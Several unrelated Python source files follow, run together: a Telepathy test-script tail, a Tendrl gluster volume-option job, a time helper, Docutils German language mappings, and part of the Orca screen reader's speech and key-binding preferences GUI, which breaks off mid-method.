				telepathy.CHANNEL_TYPE_STREAMED_MEDIA,
				smHandleType,
			)
			lastAction.append_action(rsmc)
			lastAction = lastAction.get_next_action()

			if False:
				call = Call(reqcon, rsmc, rch)
				lastAction.append_action(call)
				lastAction = lastAction.get_next_action()

			# sending a text
			rtc = RequestChannel(
				reqcon,
				rch,
				telepathy.CHANNEL_TYPE_TEXT,
				smHandleType,
			)
			lastAction.append_action(rtc)
			lastAction = lastAction.get_next_action()

			if True:
				closechan = CloseChannel(reqcon, rtc)
				lastAction.append_action(closechan)
				lastAction = lastAction.get_next_action()

				rtc = RequestChannel(
					reqcon,
					rch,
					telepathy.CHANNEL_TYPE_TEXT,
					smHandleType,
				)
				lastAction.append_action(rtc)
				lastAction = lastAction.get_next_action()

			if False:
				sendtext = SendText(reqcon, rtc, rch, telepathy.CHANNEL_TEXT_MESSAGE_TYPE_NORMAL, "Boo!")
				lastAction.append_action(sendtext)
				lastAction = lastAction.get_next_action()

		if False:
			bl = Block()
			lastAction.append_action(bl)
			lastAction = lastAction.get_next_action()

		if False:
			sl = Sleep(30 * 1000)
			lastAction.append_action(sl)
			lastAction = lastAction.get_next_action()

		dis = Disconnect(reqcon)
		lastAction.append_action(dis)
		lastAction = lastAction.get_next_action()

	quitter = QuitLoop(loop)
	lastAction.append_action(quitter)
	lastAction = lastAction.get_next_action()

	firstAction.queue_action()
	loop.run()

import json

import etcd
from tendrl.gluster_bridge.atoms.volume.set import Set


class SetVolumeOption(object):
    def __init__(self, api_job):
        super(SetVolumeOption, self).__init__()
        self.api_job = api_job
        self.atom = SetVolumeOption

    def start(self):
        attributes = json.loads(self.api_job['attributes'].decode('utf-8'))
        vol_name = attributes['volname']
        option = attributes['option_name']
        option_value = attributes['option_value']
        self.atom().start(vol_name, option, option_value)
        self.api_job['status'] = "finished"
        etcd.Client().write(self.api_job['request_id'],
                            json.dumps(self.api_job))

import sys
import time


sleep = time.sleep

if sys.platform == 'win32':
    time = time.clock
else:
    time = time.time



# Authors:   David Goodger; Gunnar Schwant
# Contact:   goodger@users.sourceforge.net
# Revision:  $Revision: 21817 $
# Date:      $Date: 2005-07-21 13:39:57 -0700 (Thu, 21 Jul 2005) $
# Copyright: This module has been placed in the public domain.

# New language mappings are welcome.  Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>.  Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.

"""
German language mappings for language-dependent features of Docutils.
"""

__docformat__ = 'reStructuredText'

labels = {
    'author': 'Autor',
    'authors': 'Autoren',
    'organization': 'Organisation',
    'address': 'Adresse',
    'contact': 'Kontakt',
    'version': 'Version',
    'revision': 'Revision',
    'status': 'Status',
    'date': 'Datum',
    'dedication': 'Widmung',
    'copyright': 'Copyright',
    'abstract': 'Zusammenfassung',
    'attention': 'Achtung!',
    'caution': 'Vorsicht!',
    'danger': '!GEFAHR!',
    'error': 'Fehler',
    'hint': 'Hinweis',
    'important': 'Wichtig',
    'note': 'Bemerkung',
    'tip': 'Tipp',
    'warning': 'Warnung',
    'contents': 'Inhalt'}
"""Mapping of node class name to label text."""

bibliographic_fields = {
    'autor': 'author',
    'autoren': 'authors',
    'organisation': 'organization',
    'adresse': 'address',
    'kontakt': 'contact',
    'version': 'version',
    'revision': 'revision',
    'status': 'status',
    'datum': 'date',
    'copyright': 'copyright',
    'widmung': 'dedication',
    'zusammenfassung': 'abstract'}
"""German (lowcased) to canonical name mapping for bibliographic fields."""

author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""

# Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA  02110-1301 USA.

"""Displays a GUI for the user to set Orca preferences."""

__id__        = "$Id$"
__version__   = "$Revision$"
__date__      = "$Date$"
__copyright__ = "Copyright (c) 2005-2009 Sun Microsystems Inc."
__license__   = "LGPL"

import os
from gi.repository import Gdk
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import GObject
from gi.repository import Pango
import pyatspi
import time

from . import acss
from . import debug
from . import guilabels
from . import messages
from . import orca
from . import orca_gtkbuilder
from . import orca_gui_profile
from . import orca_state
from . import orca_platform
from . import settings
from . import settings_manager
from . import input_event
from . import keybindings
from . import pronunciation_dict
from . import braille
from . import speech
from . import speechserver
from . import text_attribute_names

_settingsManager = settings_manager.getManager()

try:
    import louis
except ImportError:
    louis = None
from .orca_platform import tablesdir
if louis and not tablesdir:
    louis = None

(HANDLER, DESCRIP, MOD_MASK1, MOD_USED1, KEY1, CLICK_COUNT1, OLDTEXT1, \
 TEXT1, MODIF, EDITABLE) = list(range(10))

(NAME, IS_SPOKEN, IS_BRAILLED, VALUE) = list(range(4))

(ACTUAL, REPLACEMENT) = list(range(2))

# Must match the order of voice types in the GtkBuilder file.
#
(DEFAULT, UPPERCASE, HYPERLINK, SYSTEM) = list(range(4))

# Must match the order that the timeFormatCombo is populated.
#
(TIME_FORMAT_LOCALE, TIME_FORMAT_12_HM, TIME_FORMAT_12_HMS, TIME_FORMAT_24_HMS,
 TIME_FORMAT_24_HMS_WITH_WORDS, TIME_FORMAT_24_HM,
 TIME_FORMAT_24_HM_WITH_WORDS) = list(range(7))

# Must match the order that the dateFormatCombo is populated.
#
(DATE_FORMAT_LOCALE, DATE_FORMAT_NUMBERS_DM, DATE_FORMAT_NUMBERS_MD,
 DATE_FORMAT_NUMBERS_DMY, DATE_FORMAT_NUMBERS_MDY, DATE_FORMAT_NUMBERS_YMD,
 DATE_FORMAT_FULL_DM, DATE_FORMAT_FULL_MD, DATE_FORMAT_FULL_DMY,
 DATE_FORMAT_FULL_MDY, DATE_FORMAT_FULL_YMD, DATE_FORMAT_ABBREVIATED_DM,
 DATE_FORMAT_ABBREVIATED_MD, DATE_FORMAT_ABBREVIATED_DMY,
 DATE_FORMAT_ABBREVIATED_MDY, DATE_FORMAT_ABBREVIATED_YMD) = list(range(16))

class OrcaSetupGUI(orca_gtkbuilder.GtkBuilderWrapper):

    def __init__(self, fileName, windowName, prefsDict):
        """Initialize the Orca configuration GUI.

        Arguments:
        - fileName: name of the GtkBuilder file.
        - windowName: name of the component to get from the GtkBuilder file.
        - prefsDict: dictionary of preferences to use during initialization
        """

        orca_gtkbuilder.GtkBuilderWrapper.__init__(self, fileName, windowName)
        self.prefsDict = prefsDict

        self._defaultProfile = ['Default', 'default']

        # Initialize variables to None to keep pylint happy.
        #
        self.bbindings = None
        self.cellRendererText = None
        self.defaultVoice = None
        self.disableKeyGrabPref = None
        self.getTextAttributesView = None
        self.hyperlinkVoice = None
        self.initializingSpeech = None
        self.kbindings = None
        self.keyBindingsModel = None
        self.keyBindView = None
        self.newBinding = None
        self.pendingKeyBindings = None
        self.planeCellRendererText = None
        self.pronunciationModel = None
        self.pronunciationView = None
        self.screenHeight = None
        self.screenWidth = None
        self.speechFamiliesChoice = None
        self.speechFamiliesChoices = None
        self.speechFamiliesModel = None
        self.speechLanguagesChoice = None
        self.speechLanguagesChoices = None
        self.speechLanguagesModel = None
        self.speechFamilies = []
        self.speechServersChoice = None
        self.speechServersChoices = None
        self.speechServersModel = None
        self.speechSystemsChoice = None
        self.speechSystemsChoices = None
        self.speechSystemsModel = None
        self.systemVoice = None
        self.uppercaseVoice = None
        self.window = None
        self.workingFactories = None
        self.savedGain = None
        self.savedPitch = None
        self.savedRate = None
        self._isInitialSetup = False
        self.selectedFamilyChoices = {}
        self.selectedLanguageChoices = {}
        self.profilesCombo = None
        self.profilesComboModel = None
        self.startingProfileCombo = None
        self._capturedKey = []
        self.script = None

    def init(self, script):
        """Initialize the Orca configuration GUI. Read the users current
        set of preferences and set the GUI state to match. Setup speech
        support and populate the combo box lists on the Speech Tab pane
        accordingly.
        """

        self.script = script

        # Restore the default rate/pitch/gain,
        # in case the user played with the sliders.
        #        
        try:
            voices = _settingsManager.getSetting('voices')
            defaultVoice = voices[settings.DEFAULT_VOICE]
        except KeyError:
            defaultVoice = {}
        try:
            self.savedGain = defaultVoice[acss.ACSS.GAIN]
        except KeyError:
            self.savedGain = 10.0
        try:
            self.savedPitch = defaultVoice[acss.ACSS.AVERAGE_PITCH]
        except KeyError:
            self.savedPitch = 5.0
        try:
            self.savedRate = defaultVoice[acss.ACSS.RATE]
        except KeyError:
            self.savedRate = 50.0

        # ***** Key Bindings treeview initialization *****

        self.keyBindView = self.get_widget("keyBindingsTreeview")
        
        if self.keyBindView.get_columns():
            for column in self.keyBindView.get_columns():
                self.keyBindView.remove_column(column)

        self.keyBindingsModel = Gtk.TreeStore(
            GObject.TYPE_STRING,  # Handler name
            GObject.TYPE_STRING,  # Human Readable Description
            GObject.TYPE_STRING,  # Modifier mask 1
            GObject.TYPE_STRING,  # Used Modifiers 1
            GObject.TYPE_STRING,  # Modifier key name 1
            GObject.TYPE_STRING,  # Click count 1
            GObject.TYPE_STRING,  # Original Text of the Key Binding Shown 1
            GObject.TYPE_STRING,  # Text of the Key Binding Shown 1
            GObject.TYPE_BOOLEAN, # Key Modified by User
            GObject.TYPE_BOOLEAN) # Row with fields editable or not

        self.planeCellRendererText = Gtk.CellRendererText()

        self.cellRendererText = Gtk.CellRendererText()
        self.cellRendererText.set_property("ellipsize", Pango.EllipsizeMode.END)

        # HANDLER - invisble column
        #
        column = Gtk.TreeViewColumn("Handler",
                                    self.planeCellRendererText,
                                    text=HANDLER)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(HANDLER)
        self.keyBindView.append_column(column)

        # DESCRIP
        #
        column = Gtk.TreeViewColumn(guilabels.KB_HEADER_FUNCTION,
                                    self.cellRendererText,
                                    text=DESCRIP)
        column.set_resizable(True)
        column.set_min_width(380)
        column.set_sort_column_id(DESCRIP)
        self.keyBindView.append_column(column)

        # MOD_MASK1 - invisble column
        #
        column = Gtk.TreeViewColumn("Mod.Mask 1",
                                    self.planeCellRendererText,
                                    text=MOD_MASK1)
        column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(MOD_MASK1)
        self.keyBindView.append_column(column)

        # MOD_USED1 - invisble column
        #
        column = Gtk.TreeViewColumn("Use Mod.1",
                                    self.planeCellRendererText,
                                    text=MOD_USED1)
        column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(MOD_USED1)
        self.keyBindView.append_column(column)

        # KEY1 - invisble column
        #
        column = Gtk.TreeViewColumn("Key1",
                                    self.planeCellRendererText,
                                    text=KEY1)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(KEY1)
        self.keyBindView.append_column(column)

        # CLICK_COUNT1 - invisble column
        #
        column = Gtk.TreeViewColumn("ClickCount1",
                                    self.planeCellRendererText,
                                    text=CLICK_COUNT1)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(CLICK_COUNT1)
        self.keyBindView.append_column(column)

        # OLDTEXT1 - invisble column which will store a copy of the
        # original keybinding in TEXT1 prior to the Apply or OK
        # buttons being pressed.  This will prevent automatic
        # resorting each time a cell is edited.
        #
        column = Gtk.TreeViewColumn("OldText1",
                                    self.planeCellRendererText,
                                    text=OLDTEXT1)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(OLDTEXT1)
        self.keyBindView.append_column(column)

        # TEXT1
        #
        rendererText = Gtk.CellRendererText()
        rendererText.connect("editing-started",
                             self.editingKey,
                             self.keyBindingsModel)
        rendererText.connect("editing-canceled",
                             self.editingCanceledKey)
        rendererText.connect('edited',
                             self.editedKey,
                             self.keyBindingsModel,
                             MOD_MASK1, MOD_USED1, KEY1, CLICK_COUNT1, TEXT1)

        column = Gtk.TreeViewColumn(guilabels.KB_HEADER_KEY_BINDING,
                                    rendererText,
                                    text=TEXT1,
                                    editable=EDITABLE)

        column.set_resizable(True)
        column.set_sort_column_id(OLDTEXT1)
        self.keyBindView.append_column(column)

        # MODIF
        #
        rendererToggle = Gtk.CellRendererToggle()
        rendererToggle.connect('toggled',
                               self.keyModifiedToggle,
                               self.keyBindingsModel,
                               MODIF)
        column = Gtk.TreeViewColumn(guilabels.KB_MODIFIED,
                                    rendererToggle,
                                    active=MODIF,
                                    activatable=EDITABLE)
        #column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(MODIF)
        self.keyBindView.append_column(column)

        # EDITABLE - invisble column
        #
        rendererToggle = Gtk.CellRendererToggle()
        rendererToggle.set_property('activatable', False)
        column = Gtk.TreeViewColumn("Modified",
                                    rendererToggle,
                                    active=EDITABLE)
        column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(EDITABLE)
        self.keyBindView.append_column(column)
        
        # Populates the treeview with all the keybindings:
        #
        self._populateKeyBindings()

        self.window = self.get_widget("orcaSetupWindow")

        self._setKeyEchoItems()

        self.speechSystemsModel  = \
                        self._initComboBox(self.get_widget("speechSystems"))
        self.speechServersModel  = \
                        self._initComboBox(self.get_widget("speechServers"))
        self.speechLanguagesModel = \
                        self._initComboBox(self.get_widget("speechLanguages"))
        self.speechFamiliesModel = \
                        self._initComboBox(self.get_widget("speechFamilies"))
        self._initSpeechState()

        # TODO - JD: Will this ever be the case??
        self._isInitialSetup = \
            not os.path.exists(_settingsManager.getPrefsDir())

        appPage = self.script.getAppPreferencesGUI()
        if appPage:
            label = Gtk.Label(label=self.script.app.name)
            self.get_widget("notebook").append_page(appPage, label)

        self._initGUIState()

    def _getACSSForVoiceType(self, voiceType):
        """Return the ACSS value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the voice dictionary for the given voice type.
        """

        if voiceType == DEFAULT:
            voiceACSS = self.defaultVoice
        elif voiceType == UPPERCASE:
            voiceACSS = self.uppercaseVoice
        elif voiceType == HYPERLINK:
            voiceACSS = self.hyperlinkVoice
        elif voiceType == SYSTEM:
            voiceACSS = self.systemVoice
        else:
            voiceACSS = self.defaultVoice

        return voiceACSS

    def writeUserPreferences(self):
        """Write out the user's generic Orca preferences.
        """
        pronunciationDict = self.getModelDict(self.pronunciationModel)
        keyBindingsDict = self.getKeyBindingsModelDict(self.keyBindingsModel)
        self.prefsDict.update(self.script.getPreferencesFromGUI())
        _settingsManager.saveSettings(self.script,
                                      self.prefsDict,
                                      pronunciationDict,
                                      keyBindingsDict)

    def _getKeyValueForVoiceType(self, voiceType, key, useDefault=True):
        """Look for the value of the given key in the voice dictionary
           for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - key: the key to look for in the voice dictionary.
        - useDefault: if True, and the key isn't found for the given voice
                      type, the look for it in the default voice dictionary
                      as well.

        Returns the value of the given key, or None if it's not set.
        """

        if voiceType == DEFAULT:
            voice = self.defaultVoice
        elif voiceType == UPPERCASE:
            voice = self.uppercaseVoice
            if key not in voice:
                if not useDefault:
                    return None
                voice = self.defaultVoice
        elif voiceType == HYPERLINK:
            voice = self.hyperlinkVoice
            if key not in voice:
                if not useDefault:
                    return None
                voice = self.defaultVoice
        elif voiceType == SYSTEM:
            voice = self.systemVoice
            if key not in voice:
                if not useDefault:
                    return None
                voice = self.defaultVoice
        else:
            voice = self.defaultVoice

        if key in voice:
            return voice[key]
        else:
            return None

    def _getFamilyNameForVoiceType(self, voiceType):
        """Gets the name of the voice family for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the name of the voice family for the given voice type,
        or None if not set.
        """

        familyName = None
        family = self._getKeyValueForVoiceType(voiceType, acss.ACSS.FAMILY)

        if family and speechserver.VoiceFamily.NAME in family:
            familyName = family[speechserver.VoiceFamily.NAME]

        return familyName

    def _setFamilyNameForVoiceType(self, voiceType, name, language, dialect, variant):
        """Sets the name of the voice family for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - name: the name of the voice family to set.
        - language: the locale of the voice family to set.
        - dialect: the dialect of the voice family to set.
        """

        family = self._getKeyValueForVoiceType(voiceType,
                                               acss.ACSS.FAMILY,
                                               False)

        voiceACSS = self._getACSSForVoiceType(voiceType)
        if family:
            family[speechserver.VoiceFamily.NAME] = name
            family[speechserver.VoiceFamily.LANG] = language
            family[speechserver.VoiceFamily.DIALECT] = dialect
            family[speechserver.VoiceFamily.VARIANT] = variant
        else:
            voiceACSS[acss.ACSS.FAMILY] = {}
            voiceACSS[acss.ACSS.FAMILY][speechserver.VoiceFamily.NAME] = name
            voiceACSS[acss.ACSS.FAMILY][speechserver.VoiceFamily.LANG] = language
            voiceACSS[acss.ACSS.FAMILY][speechserver.VoiceFamily.DIALECT] = dialect
            voiceACSS[acss.ACSS.FAMILY][speechserver.VoiceFamily.VARIANT] = variant
        voiceACSS['established'] = True

        #settings.voices[voiceType] = voiceACSS

    def _getRateForVoiceType(self, voiceType):
        """Gets the speaking rate value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the rate value for the given voice type, or None if
        not set.
        """

        return self._getKeyValueForVoiceType(voiceType, acss.ACSS.RATE)

    def _setRateForVoiceType(self, voiceType, value):
        """Sets the speaking rate value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - value: the rate value to set.
        """

        voiceACSS = self._getACSSForVoiceType(voiceType)
        voiceACSS[acss.ACSS.RATE] = value
        voiceACSS['established'] = True
        #settings.voices[voiceType] = voiceACSS

    def _getPitchForVoiceType(self, voiceType):
        """Gets the pitch value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the pitch value for the given voice type, or None if
        not set.
        """

        return self._getKeyValueForVoiceType(voiceType,
                                             acss.ACSS.AVERAGE_PITCH)

    def _setPitchForVoiceType(self, voiceType, value):
        """Sets the pitch value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - value: the pitch value to set.
        """

        voiceACSS = self._getACSSForVoiceType(voiceType)
        voiceACSS[acss.ACSS.AVERAGE_PITCH] = value
        voiceACSS['established'] = True
        #settings.voices[voiceType] = voiceACSS

    def _getVolumeForVoiceType(self, voiceType):
        """Gets the volume (gain) value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the volume (gain) value for the given voice type, or
        None if not set.
        """

        return self._getKeyValueForVoiceType(voiceType, acss.ACSS.GAIN)

    def _setVolumeForVoiceType(self, voiceType, value):
        """Sets the volume (gain) value for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - value: the volume (gain) value to set.
        """

        voiceACSS = self._getACSSForVoiceType(voiceType)
        voiceACSS[acss.ACSS.GAIN] = value
        voiceACSS['established'] = True
        #settings.voices[voiceType] = voiceACSS

    def _setVoiceSettingsForVoiceType(self, voiceType):
        """Sets the family, rate, pitch and volume GUI components based
        on the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        """

        familyName = self._getFamilyNameForVoiceType(voiceType)
        self._setSpeechFamiliesChoice(familyName)

        rate = self._getRateForVoiceType(voiceType)
        if rate is not None:
            self.get_widget("rateScale").set_value(rate)
        else:
            self.get_widget("rateScale").set_value(50.0)
            
        pitch = self._getPitchForVoiceType(voiceType)
        if pitch is not None:
            self.get_widget("pitchScale").set_value(pitch)
        else:
            self.get_widget("pitchScale").set_value(5.0)

        volume = self._getVolumeForVoiceType(voiceType)
        if volume is not None:
            self.get_widget("volumeScale").set_value(volume)
        else:
            self.get_widget("volumeScale").set_value(10.0)

    def _setSpeechFamiliesChoice(self, familyName):
        """Sets the active item in the families ("Person:") combo box
        to the given family name.

        Arguments:
        - familyName: the family name to use to set the active combo box item.
        """

        if len(self.speechFamilies) == 0:
            return

        languageSet = False
        familySet = False
        for family in self.speechFamilies:
            name = family[speechserver.VoiceFamily.NAME]
            if name == familyName:
                lang = family[speechserver.VoiceFamily.LANG]
                dialect = family[speechserver.VoiceFamily.DIALECT]

                if dialect:
                    language = lang + '-' + dialect
                else:
                    language = lang

                i = 0
                for languageChoice in self.speechLanguagesChoices:
                    if languageChoice == language:
                        self.get_widget("speechLanguages").set_active(i)
                        self.speechLanguagesChoice = self.speechLanguagesChoices[i]
                        languageSet = True

                        self._setupFamilies()

                        i = 0
                        for familyChoice in self.speechFamiliesChoices:
                            name = familyChoice[speechserver.VoiceFamily.NAME]
                            if name == familyName:
                                self.get_widget("speechFamilies").set_active(i)
                                self.speechFamiliesChoice = self.speechFamiliesChoices[i]
                                familySet = True
                                break
                            i += 1

                        break

                    i += 1

                break

        if not languageSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech language match for %s" \
                          % familyName)
            self.get_widget("speechLanguages").set_active(0)
            self.speechLanguagesChoice = self.speechLanguagesChoices[0]

        if languageSet:
            self.selectedLanguageChoices[self.speechServersChoice] = i

        if not familySet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech family match for %s" \
                          % familyName)
            self.get_widget("speechFamilies").set_active(0)
            self.speechFamiliesChoice = self.speechFamiliesChoices[0]

        if familySet:
            self.selectedFamilyChoices[self.speechServersChoice,
                    self.speechLanguagesChoice] = i

    def _setupFamilies(self):
        """Gets the list of voice variants for the current speech server and
        current language.
        If there are variants, get the information associated with
        each voice variant and add an entry for it to the variants
        GtkComboBox list.
        """

        self.speechFamiliesModel.clear()

        currentLanguage = self.speechLanguagesChoice

        i = 0
        self.speechFamiliesChoices = []
        for family in self.speechFamilies:
            lang = family[speechserver.VoiceFamily.LANG]
            dialect = family[speechserver.VoiceFamily.DIALECT]

            if dialect:
                language = lang + '-' + dialect
            else:
                language = lang

            if language != currentLanguage:
                continue

            name = family[speechserver.VoiceFamily.NAME]
            self.speechFamiliesChoices.append(family)
            self.speechFamiliesModel.append((i, name))
            i += 1

        if i == 0:
            debug.println(debug.LEVEL_SEVERE, "No speech family was available for %s." % str(currentLanguage))
            debug.printStack(debug.LEVEL_FINEST)
            self.speechFamiliesChoice = None
            return

        # If user manually selected a family for the current speech server
        # this choice it's restored. In other case the first family
        # (usually the default one) is selected
        #
        selectedIndex = 0
        if (self.speechServersChoice, self.speechLanguagesChoice) \
                in self.selectedFamilyChoices:
            selectedIndex = self.selectedFamilyChoices[self.speechServersChoice,
                    self.speechLanguagesChoice]

        self.get_widget("speechFamilies").set_active(selectedIndex)

    def _setSpeechLanguagesChoice(self, languageName):
        """Sets the active item in the languages ("Language:") combo box
        to the given language name.

        Arguments:
        - languageName: the language name to use to set the active combo box item.
        """

        print("setSpeechLanguagesChoice")

        if len(self.speechLanguagesChoices) == 0:
            return

        valueSet = False
        i = 0
        for language in self.speechLanguagesChoices:
            if language == languageName:
                self.get_widget("speechLanguages").set_active(i)
                self.speechLanguagesChoice = self.speechLanguagesChoices[i]
                valueSet = True
                break
            i += 1

        if not valueSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech language match for %s" \
                          % languageName)
            self.get_widget("speechLanguages").set_active(0)
            self.speechLanguagesChoice = self.speechLanguagesChoices[0]

        if valueSet:
            self.selectedLanguageChoices[self.speechServersChoice] = i

        self._setupFamilies()

    def _setupVoices(self):
        """Gets the list of voices for the current speech server.
        If there are families, get the information associated with
        each voice family and add an entry for it to the families
        GtkComboBox list.
        """

        self.speechLanguagesModel.clear()

        self.speechFamilies = self.speechServersChoice.getVoiceFamilies()

        self.speechLanguagesChoices = []

        if len(self.speechFamilies) == 0:
            debug.println(debug.LEVEL_SEVERE, "No speech voice was available.")
            debug.printStack(debug.LEVEL_FINEST)
            self.speechLanguagesChoice = None
            return

        done = {}
        i = 0
        for family in self.speechFamilies:
            lang = family[speechserver.VoiceFamily.LANG]
            dialect = family[speechserver.VoiceFamily.DIALECT]
            if (lang,dialect) in done:
                continue
            done[lang,dialect] = True

            if dialect:
                language = lang + '-' + dialect
            else:
                language = lang

            # TODO: get translated language name from CLDR or such
            msg = language
            if msg == "":
                # Unsupported locale
                msg = "default language"

            self.speechLanguagesChoices.append(language)
            self.speechLanguagesModel.append((i, msg))
            i += 1

        # If user manually selected a language for the current speech server
        # this choice it's restored. In other case the first language
        # (usually the default one) is selected
        #
        selectedIndex = 0
        if self.speechServersChoice in self.selectedLanguageChoices:
            selectedIndex = self.selectedLanguageChoices[self.speechServersChoice]

        self.get_widget("speechLanguages").set_active(selectedIndex)
        if self.initializingSpeech:
            self.speechLanguagesChoice = self.speechLanguagesChoices[selectedIndex]

        self._setupFamilies()

        # The family name will be selected as part of selecting the
        # voice type.  Whenever the families change, we'll reset the
        # voice type selection to the first one ("Default").
        #
        comboBox = self.get_widget("voiceTypesCombo")
        types = [guilabels.SPEECH_VOICE_TYPE_DEFAULT,
                 guilabels.SPEECH_VOICE_TYPE_UPPERCASE,
                 guilabels.SPEECH_VOICE_TYPE_HYPERLINK,
                 guilabels.SPEECH_VOICE_TYPE_SYSTEM]
        self.populateComboBox(comboBox, types)
        comboBox.set_active(DEFAULT)
        voiceType = comboBox.get_active()
        self._setVoiceSettingsForVoiceType(voiceType)

    def _setSpeechServersChoice(self, serverInfo):
        """Sets the active item in the speech servers combo box to the
        given server.

        Arguments:
        - serversChoices: the list of available speech servers.
        - serverInfo: the speech server to use to set the active combo
        box item.
        """

        if len(self.speechServersChoices) == 0:
            return

        # We'll fallback to whatever we happen to be using in the event
        # that this preference has never been set.
        #
        if not serverInfo:
            serverInfo = speech.getInfo()

        valueSet = False
        i = 0
        for server in self.speechServersChoices:
            if serverInfo == server.getInfo():
                self.get_widget("speechServers").set_active(i)
                self.speechServersChoice = server
                valueSet = True
                break
            i += 1

        if not valueSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech server match for %s" \
                          %  repr(serverInfo))
            self.get_widget("speechServers").set_active(0)
            self.speechServersChoice = self.speechServersChoices[0]

        self._setupVoices()

    def _setupSpeechServers(self):
        """Gets the list of speech servers for the current speech factory.
        If there are servers, get the information associated with each
        speech server and add an entry for it to the speechServers
        GtkComboBox list.  Set the current choice to be the first item.
        """

        self.speechServersModel.clear()
        self.speechServersChoices = \
                self.speechSystemsChoice.SpeechServer.getSpeechServers()
        if len(self.speechServersChoices) == 0:
            debug.println(debug.LEVEL_SEVERE, "Speech not available.")
            debug.printStack(debug.LEVEL_FINEST)
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None
            return

        i = 0
        for server in self.speechServersChoices:
            name = server.getInfo()[0]
            self.speechServersModel.append((i, name))
            i += 1

        self._setSpeechServersChoice(self.prefsDict["speechServerInfo"])

        debug.println(
            debug.LEVEL_FINEST,
            "orca_gui_prefs._setupSpeechServers: speechServersChoice: %s" \
            % self.speechServersChoice.getInfo())

    def _setSpeechSystemsChoice(self, systemName):
        """Set the active item in the speech systems combo box to the
        given system name.

        Arguments:
        - factoryChoices: the list of available speech factories (systems).
        - systemName: the speech system name to use to set the active combo
        box item.
        """

        systemName = systemName.strip("'")

        if len(self.speechSystemsChoices) == 0:
            self.speechSystemsChoice = None
            return

        valueSet = False
        i = 0
        for speechSystem in self.speechSystemsChoices:
            name = speechSystem.__name__
            if name.endswith(systemName):
                self.get_widget("speechSystems").set_active(i)
                self.speechSystemsChoice = self.speechSystemsChoices[i]
                valueSet = True
                break
            i += 1

        if not valueSet:
            debug.println(debug.LEVEL_FINEST,
                          "Could not find speech system match for %s" \
                          % systemName)
            self.get_widget("speechSystems").set_active(0)
            self.speechSystemsChoice = self.speechSystemsChoices[0]

        self._setupSpeechServers()

    def _setupSpeechSystems(self, factories):
        """Sets up the speech systems combo box and sets the selection
        to the preferred speech system.

        Arguments:
        -factories: the list of known speech factories (working or not)
        """
        self.speechSystemsModel.clear()
        self.workingFactories = []
        for factory in factories:
            try:
                servers = factory.SpeechServer.getSpeechServers()
                if len(servers):
                    self.workingFactories.append(factory)
            except:
                debug.printException(debug.LEVEL_FINEST)

        self.speechSystemsChoices = []
        if len(self.workingFactories) == 0:
            debug.println(debug.LEVEL_SEVERE, "Speech not available.")
            debug.printStack(debug.LEVEL_FINEST)
            self.speechSystemsChoice = None
            self.speechServersChoices = []
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None
            return

        i = 0
        for workingFactory in self.workingFactories:
            self.speechSystemsChoices.append(workingFactory)
            name = workingFactory.SpeechServer.getFactoryName()
            self.speechSystemsModel.append((i, name))
            i += 1

        if self.prefsDict["speechServerFactory"]:
            self._setSpeechSystemsChoice(self.prefsDict["speechServerFactory"])
        else:
            self.speechSystemsChoice = None

        debug.println(
            debug.LEVEL_FINEST,
            "orca_gui_prefs._setupSpeechSystems: speechSystemsChoice: %s" \
            % self.speechSystemsChoice)

    def _initSpeechState(self):
        """Initialize the various speech components.
        """

        voices = self.prefsDict["voices"]
        self.defaultVoice   = acss.ACSS(voices.get(settings.DEFAULT_VOICE))
        self.uppercaseVoice = acss.ACSS(voices.get(settings.UPPERCASE_VOICE))
        self.hyperlinkVoice = acss.ACSS(voices.get(settings.HYPERLINK_VOICE))
